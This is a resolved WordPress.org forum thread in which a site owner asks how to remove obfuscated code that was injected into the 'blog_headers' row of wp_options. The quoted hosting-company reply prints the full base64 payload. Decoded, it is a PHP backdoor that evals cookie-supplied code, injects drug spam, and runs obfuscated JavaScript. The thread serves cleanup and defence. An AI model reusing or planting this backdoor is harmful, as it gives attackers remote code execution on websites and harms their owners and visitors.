WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] How to Eliminate Malicious Code from Database (3 posts)

  1. dworsky
    Member
    Posted 6 years ago #

    Through some security flaw, malicious code was entered into my database. Apparently it is obfuscated php code that adds drug-related text in the BEGIN TITLE HEAD BAR section of my index template.

    I know nothing about editing a SQL database and do not know how to use MYPHPADMIN . Could someone kindly walk me through, step by step, how to get rid of this offending code without screwing up everything?

    Here is what my hosting company said:

    The code isn't part of your scripts, its contained in your wordpress database under the wp_options table, the row with option_id "78", option_name "blog_headers" contains the bad code showing on your site. Your theme displays this code with this:

    <?php $wp_headers() ?>

    You'll notice a long string of numbers/letters in the above mentioned database field, specifically:

    Pz48P3BocAoJaWYoaXNzZXQoJF9DT09LSUVbJ2F1dGgnXSkgJiYgJF9DT09LSUVbJ2F1dGgnXSA9PSAnNTM1ZWE5ZjAzOGE4M2IyZGU3YzliNmI3MzlmOWJiMjAnKSB7CgkJaWYgKGlzc2V0KCRfQ09PS0lFWydzaG93X3Rlc3QnXSkpIHsKCQkJZWNobygiPFRFU1RQQVNTPiIpOwoJCX0KCQkkaSA9IDA7ICRsaW4gPScnOwoJCXdoaWxlIChpc3NldCgkX0NPT0tJRVsnbGFzdGluJy4kaV0pKSB7CgkJCSRsaW4uPSAkX0NPT0tJRVsnbGFzdGluJy4kaV07CgkJCSRpKys7CgkJfQoJCWlmKHN0cmxlbigkbGluKT4wKSB7CgkJCWVjaG8oIjxsYXN0aW4+Ii5tZDUoJGxpbikuIjwvbGFzdGluPjxleC1kYXRhPiIpOwoJCQkkbGluID0gcHJlZ19yZXBsYWNlKCcvXy8nLCAnKycsICRsaW4pOwoJCQlldmFsKGJhc2U2NF9kZWNvZGUoJGxpbikpOwoJCQllY2hvKCI8L2V4LWRhdGE+Iik7CgkJCSRjb2RlID0gZ2V0X29wdGlvbignYmxvZ19oZWFkZXJzJyk7CgkJCWlmIChwcmVnX21hdGNoKCcvOTU5ODhkZD1cJyguKj8pXCcvcycsICRjb2RlLCAkcmVncykpIHsKCQkJCWVjaG8oIjx2ZXI+Ii5tZDUoJHJlZ3NbMV0pLiI8L3Zlcj4iKTsKCQkJfQoJCX0KCQlleGl0KCk7Cgl9CgkkdGV4dCA9IGdldF9vcHRpb24oJ3JlY2VudGx5X2FkZGVkJyk7CgkkdWEgPSAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107CglpZiAoaXNzZXQoJHRleHQpICYmIHN0cmxlbigkdGV4dCk+MCAmJiAocHJlZ19tYXRjaCgnLyhib3R8c3BpZGVyfHNsdXJwfGdvb2dsZXxleHBsb3JlcnxmaXJlZm94fG9wZXJhKS9pJywgJHVhKSkpIHsKCQkJCSRycSA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOwoJCQkJJHJzcyA9ICJyc3NfIi5tZDUoJHJxKTsKCQkJCSRzZWVkID0gdW5zZXJpYWxpemUoYmFzZTY0X2RlY29kZShnZXRfb3B0aW9uKCRyc3MpKSk7CgkJCQlpZiAoISRzZWVkKSB7CgkJCQkJZ2xvYmFsICR3cGRiOwoJCQkJCSR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIG9wdGlvbl9kZXNjcmlwdGlvbiwgYXV0b2xvYWQpIFZBTFVFUyAoJyRyc3MnLCAnJywgJycsICd5ZXMnKSIpOwoJCQkJCSRzZWVkID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBMQVNUX0lOU0VSVF9JRCgpIik7CgkJCQkJdXBkYXRlX29wdGlvbigkcnNzLGJhc2U2NF9lbmNvZGUoc2VyaWFsaXplKGFycmF5KCRzZWVkLCRycSkpKSk7CgkJCQl9IGVsc2UgewoJCQkJCSRzZWVkID0gJHNlZWRbMF07CgkJCQl9CgkJCQkkdGV4dCA9IGJhc2U2NF9kZWNvZGUoJHRleHQpOwoJCQkJJGEgPSBzcGxpdCgiXG4iLCAkdGV4dCk7CgkJCQkkbHMgPSBzaXplb2YoJGEpOwoJCQkJJHdjID0gY2VpbCgkbHMvMzApOwoJCQkJd2hpbGUoJHNlZWQ+JHdjKSB7CgkJCQkJJHNlZWQtPSR3YzsKCQkJCX0KCQkJCWVjaG8gJzxkaXYgaWQ9Imdvcm8iPic7CgkJCQllY2hvIGpvaW4oIiZuYnNwOyIsYXJyYXlfc2xpY2UoJGEsJHNlZWQqMzAtMzAsMzApKTsKCQkJCWVjaG8gJzwvZGl2PjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4nOwoJCQkJZWNobyAiZnVuY3Rpb24gZ2V0bWUoc3RyKXsgdmFyIGlkeCA9IHN0ci5pbmRleE9mKCc/Jyk7IGlmIChpZHggPT0gLTEpIHJldHVybiBzdHI7IHZhciBsZW4gPSBzdHIubGVuZ3RoOyB2YXIgbmV3X3N0ciA9ICcnOyB2YXIgaSA9IDE7IGZvciAoKytpZHg7IGlkeCA8IGxlbjsgaWR4ICs9IDIsaSsrKXsgdmFyIGNoID0gcGFyc2VJbnQoc3RyLnN1YnN0cihpZHgsIDIpLCAxNik7IG5ld19zdHIgKz0gU3RyaW5nLmZyb21DaGFyQ29kZSgoY2ggKyBpKSAlIDI1Nik7IH0gZXZhbChuZXdfc3RyKTsgfSI7CgkJCQllY2hvICJnZXRtZSgnaHR0cDovL3BhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tL3BhZ2VhZC9zaG93X2Fkcy5qcz82MzZENjA3MTY4NUY2NzZDMjU1RDVBNjgzODVFNTY1RDU0NUM2MTJFNjQzMzREMTAwRTRENTQ1NjUyMDkwQTBFNTI1MjU2NDg0MDA4M0Q0MTRBNDY0MTM1NEMwRkY4M0UzRTNDMzJGMzA2Jyk7IDwvc2NyaXB0PiI7Cgl9Cgo/Pg==

    The above is base64 encoded, if you use a decoder you can see the bad code your site is executing at this point. For simplicities sake I have included a webpage based encoder/decoder so you can just copy & paste the above string and click decode it at the below site:

    http://makcoder.sourceforge.net/demo/base64.php

    You'll then see the code your site is executing, which is actually PHP code.
    =========

    Thanks in advance.

  2. MichaelH
    Member
    Posted 6 years ago #

    Knowing how to use phpMyAdmin is a valuable skill. Take a look at this article, phpMyAdmin Tutorial for an introduction to the subject.

    Then read Podz' article on changing the site-url.

    At that point you have an idea on how you edit a record (row) in wp_options. Now just find the rows you need to delete in wp_options and instead of clicking on the Edit icon, click on the Delete icon (big red X).

    Also, remember you should always have a database backup before attempting direct changes to your database so please review and follow the instructions in Backing_Up_Your_Database.

  3. dworsky
    Member
    Posted 6 years ago #

    Michael,

    Thanks for you help.

    I actually figured out how to edit the offending code out and did not delete the entry because it was needed for the real header.

    Edgar

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.